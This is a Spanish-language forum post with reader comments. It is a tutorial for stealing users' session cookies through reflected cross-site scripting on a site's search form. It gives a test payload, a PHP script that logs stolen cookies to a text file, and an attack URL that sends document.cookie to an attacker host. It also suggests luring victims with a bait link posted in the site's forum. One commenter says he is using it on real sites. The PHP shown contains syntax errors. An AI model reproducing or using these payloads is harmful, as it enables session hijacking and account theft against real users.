epespad

ejemplo de como robar cookies en Cross Site Scripting [XSS]

**************
Ataque Cross Site Scripting [XSS]
**************

Este ataque lo realizaremos en webs que utilizen cookies y que tengan un buscador, de esos que tienen un formulario y un boton.

El ataque consiste en redireccionar a un usuario de la web a un enlace nuestro donde la direccion sera nuestra url de ataque, la cual guardara la cookie del usuario en un archivo txt o en una base de datos.

Para saber si el buscador de la web es vulnerable en el formulario pondremos

<script>alert()</script>,

si salta una alarma nos indicara que ya tenemos una posible victima, en caso contrario, seguiremos buscando.

Ahora nesecitamos saber el nombre del formulario y del boton, para esto nos fijamos en el codigo fuente de la web y buscamos algo como:

<input type="text" name="palabra">
<input type="submit" name="buscar" value="Buscar">


Ya sabemos que el formulario se llama "palabra" y el boton "buscar", esto lo nesecitaremos para crear la url de ataque.

Ahora elegiremos si guardar las cookies en un archivo txt o en una base de datos, elegiremos la opcion del txt, ya que es mucho mas facil y es la que voy a explicar.
Lo siguiente sera crear una pagina php, la cual sera la encargada de crear el archivo txt y guardar las cookies dentro.

El nombre de la pagina sera cookies.php y tendra el siguiente codigo:

<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a";
fwrite($fff, "$cookie \n";
fclose($fff);
?>


Listo, nos queda crear la url de ataque y tendremos las cookies de las victimas que caigan.

La url tendria el siguiente formato: (la pagina buscador.php puede variar el nombre)

http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

Es recomendable ingresar al foro o guestbook de la web, y poner algo como:

Si quieres ver las ultimas noticias sobre tu grupo de musica preferido presiona AQUI.

Donde AQUI seria un enlace a nuestra url de ataque, la cual llevaria al usuario a dejarnos su cookie, y el tema del comentario varia segun la clase de contenido que muestre la web.

espero que les guste
no me hago responsable del uso q le den a ese tuto.

Comentar es agradecer

a, y si quieren un tutorial muy completo y explicativo sobre Cross Site Scripting [XSS] pasen por aca.

http://taringa.net/posts/ebooks-tutoriales/2306553/tutorial-de--cross-site-scripting-%5BXSS%5D+como-atacar+ejemplos.html

muy bueno

6 comentarios - ejemplo de como robar cookies en Cross Site Scripting [XSS]

dapsu
chee tipico Novato¡¡
thechoknt
jaja k onda man
jaj gracias por tu post
me sta ayudando tengo varias webs .com concidas ke encontre bugs
:p
bueno sale
adios no te doi puntosporq no soi fulluser
bueno bie
femar18
No entiendo como podes registrar las cookies con $_GET[\'cookie\'] cuando ese parametro no existe, me imagino que el codigo podria llegar a ser algo asi:
&lt;?php
$cookie=implode(\&quot;\\n\&quot;,$_COOKIE);
file_put_contents(\&quot;archivo.txt\&quot;,$cookie);
?&gt;
esto funcionaria si podes inyectar un link por XSS o XSS URI en un form con PHP_SELF para obtener las cookies del dominio, pero no estoy del todo seguro, podes explicar como funciona?.